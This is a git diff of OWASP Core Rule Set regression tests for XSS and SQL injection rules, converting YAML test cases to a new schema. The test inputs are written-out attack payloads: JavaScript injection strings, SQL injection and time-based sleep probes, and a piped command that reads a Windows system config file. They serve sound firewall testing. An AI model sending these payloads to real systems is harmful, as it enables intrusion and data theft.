a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml index b412b7475..0de1e929e 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml @@ -1,151 +1,149 @@ --- meta: author: "Franziska Buehler, Xhoenix, azurit" - description: None - enabled: true - name: 941390.yaml +rule_id: 941390 tests: - - test_title: 941390-1 + - test_id: 1 desc: "JavaScript method setInterval(code, 1)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=setInterval%28code%2C%201%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=setInterval%28code%2C%201%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 2 desc: "JavaScript method: arg=x\";setTimeout(name, 1)//" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=x%22%3BsetTimeout%28name%2C%201%29%2F%2F" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=x%22%3BsetTimeout%28name%2C%201%29%2F%2F" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 3 desc: "JavaScript method eval('2 + 2')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=eval%28%272%20%2B%202%27%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=eval%28%272%20%2B%202%27%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 4 desc: "JavaScript constructor new Function()" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=new%20Function%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=new%20Function%28%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 5 desc: "JavaScript call alert" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=alert%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=alert%28%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 6 desc: "JavaScript call atob" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=atob%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=atob%28%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 7 desc: "JavaScript call btoa" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=btoa%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=btoa%28%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 8 desc: "JavaScript call prompt" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=prompt%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=prompt%28%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 9 desc: "JavaScript call confirm" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=confirm%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=confirm%28%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml index ddecdfe8e..12cc969e8 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml @@ -1,119 +1,117 @@ --- meta: author: "Andrea Menin, azurit" - description: None - enabled: true - name: 941400.yaml +rule_id: 941400 tests: - - test_title: 941400-1 + - test_id: 1 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%5D.sort.call%60%24%7Balert%7D1337%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%5D.sort.call%60%24%7Balert%7D1337%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] + - test_id: 2 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%20%20%5D%20.%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%20%20%5D%20.%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] + - test_id: 3 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%20%20%5D%20.%20%2F%2A%2A%2F%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%20%20%5D%20.%20%2F%2A%2A%2F%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] + - test_id: 4 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%5D.map.call%60%24%7Beval%7D%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%5D.map.call%60%24%7Beval%7D%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] + - test_id: 5 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%201234%20%5D.%20map%20.%20call%60%24%7Beval%7D%2F%2A%20asd%20%2A%2F%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%201234%20%5D.%20map%20.%20call%60%24%7Beval%7D%2F%2A%20asd%20%2A%2F%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] + - test_id: 6 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=Reflect.apply.call%60%24%7Bnavigation.navigate%7D%24%7Bnavigation%7D%24%7B%5Bname%5D%7D%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=Reflect.apply.call%60%24%7Bnavigation.navigate%7D%24%7Bnavigation%7D%24%7B%5Bname%5D%7D%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] + - test_id: 7 desc: "Status Page Test - JavaScript minimal test with Reflect.sort.call``" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?test=Reflect.sort.call%60%60" - version: HTTP/1.1 - output: - log_contains: id "941400" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?test=Reflect.sort.call%60%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml index 69fb90117..e7c61638c 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml @@ -2,244 +2,243 @@ meta: author: "Christian Folini, azurit" description: Various SQL injection tests - enabled: true - name: 942100.yaml +rule_id: 942100 tests: - - test_title: 942100-1 + - test_id: 1 desc: "Simple SQL Injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=1234 OR 1=1" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=1234 OR 1=1" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 2 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=-1839' or '1'='1" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=-1839' or '1'='1" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 3 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=-1839\" or \"1\"=\"2" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=-1839\" or \"1\"=\"2" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 4 desc: "Basic SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=2010-01-01'+sleep(20.to_i)+'" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=2010-01-01'+sleep(20.to_i)+'" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 5 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=EmptyValue' and 526=527" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=EmptyValue' and 526=527" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 6 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo') UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo') UNION ALL select NULL --" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 7 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo')waitfor%20delay'5%3a0%3a20'--" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo')waitfor%20delay'5%3a0%3a20'--" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 8 desc: "Simple SQL Injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 9 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 10 desc: "Advanced SQL Injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "1'||(select extractvalue(xmltype('%toyop;" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "1'||(select extractvalue(xmltype('%toyop;" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 11 desc: "Simple function call" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=sleep(20)" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=sleep(20)" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 12 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=unittests@coreruleset.org\" sleep(10.to_i) \"" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=unittests@coreruleset.org\" sleep(10.to_i) \"" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 13 desc: "Advanced injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\" | type %SystemDrive%\\\\config.ini | \"" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\" | type %SystemDrive%\\\\config.ini | \"" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 14 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\"unittests@coreruleset.org\"')) and (select*from(select(sleep(5)))x) --" - version: HTTP/1.0 - output: - log_contains: id "942100" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\"unittests@coreruleset.org\"')) and (select*from(select(sleep(5)))x) --" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml index 37a054a9a..5af7502c1 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml @@ -2,182 +2,181 @@ meta: author: "Christian Folini, Matteo Pace, azurit" description: Various SQL injection tests - enabled: true - name: 942101.yaml +rule_id: 942101 tests: - - test_title: 942101-1 + - test_id: 1 desc: "Simple SQL Injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/1234%20OR%201=1" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/1234%20OR%201=1" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 2 desc: "Basic SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/2010-01-01'+sleep(20.to_i)+'" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/2010-01-01'+sleep(20.to_i)+'" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 3 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/EmptyValue'%20and%20526=527" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/EmptyValue'%20and%20526=527" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 4 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo')waitfor%20delay'5%3a0%3a20'--" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-5 + - input: + dest_addr: 127.0.0.1 